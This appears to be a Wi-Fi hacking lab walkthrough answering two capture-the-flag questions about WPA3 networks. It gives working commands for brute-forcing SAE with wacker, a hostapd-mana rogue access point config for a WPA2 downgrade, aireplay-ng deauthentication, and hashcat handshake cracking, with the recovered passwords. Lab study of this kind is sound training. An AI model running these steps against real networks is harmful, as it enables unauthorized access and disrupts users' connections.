SAE WPA3

13. What is the wifi-management password?

In WPA3 networks it is still possible to brute force until the password is found, to do this we can use “wacker”.

https://github.com/blunderbuss-wctf/wacker

sudo ./wacker.py --wordlist ~/10-million-password-list-top-100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462

chocolate1

14. What is the wifi-IT password?

If a network with WPA3 SAE has a client configured for WPA2/WPA3 we can perform a downgrade against the client forcing it to connect to our RogueAP with WPA2 obtaining the handshake to crack it later, as in the case of wifi-offices. In this case we can see that the AP uses SAE and PSK, so maybe the clients accept PSK too. We can get this information in the airodump-ng “.csv” file.

hostapd-sae.conf

interface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=wifi-IT
mana_wpaout=hostapd-management.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

This is a Hostapd configuration file used to set up a fake access point (AP) for penetration testing purposes. Here’s a breakdown of each line:

1️⃣ Interface & Driver Configuration

interface=wlan1
driver=nl80211

  • interface=wlan1 → Specifies that wlan1 is the wireless network interface to be used for hosting the fake AP.

  • driver=nl80211 → Uses the nl80211 driver, which is common for modern Linux-based wireless devices.

2️⃣ Wireless Mode & Channel Selection

hw_mode=g
channel=11

  • hw_mode=g → Sets the 802.11g standard, which operates on the 2.4 GHz band and supports speeds up to 54 Mbps.

  • channel=11 → Specifies Channel 11 (2462 MHz) for the AP.

3️⃣ SSID & WPA Handshake Capture

ssid=wifi-IT
mana_wpaout=hostapd-management.hccapx

  • ssid=wifi-IT → This is the SSID (Wi-Fi network name) that the AP will broadcast.

  • mana_wpaout=hostapd-management.hccapx → Captures WPA handshakes and saves them in the HCCAPX format, which is used for offline password cracking with Hashcat.

4️⃣ WPA Security Settings

iniCopyEditwpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

  • wpa=2 → Configures WPA2 encryption (stronger than WPA1).

  • wpa_key_mgmt=WPA-PSK → Uses Pre-Shared Key (PSK) authentication.

  • wpa_pairwise=TKIP CCMP → Supports both TKIP (legacy) and CCMP (AES-based, stronger encryption).

  • wpa_passphrase=12345678 → Sets the Wi-Fi password to 12345678.

What This Configuration Does

✅ Creates a fake Wi-Fi network named "wifi-IT" on channel 11 (2.462 GHz). ✅ Uses WPA2-PSK encryption with the password "12345678". ✅ Captures WPA handshakes in HCCAPX format for cracking later. ✅ Uses wlan1 interface with nl80211 driver.

hostapd-mana hostapd-sae.conf

We can check if the AP has MFP(802.11w) with Wireshark:

wireshark-mfp

In this case 802.11w is disabled so we can deauth:

# In this case 802.11w is disabled so we can deauth
iwconfig wlan0mon channel 11
aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25  -c 10:F9:6F:AC:53:52

And you will be able to capture the handshake.

Save the hccapx to pcap

hcxhash2cap --hccapx=hostapd-management.hccapx -c aux-management.pcap

Export the 22000 hash mode from the pcap

hcxpcapngtool aux-management.pcap -o hash-management.22000

Crack outside the VM or with a new version of hashcat.

sudo hashcat -a 0 -m 22000 hash-management.22000 ~/10-million-password-list-top-100000.txt --force

bubblegum

PreviousPSK - WPA2NextMGT Recon

Last updated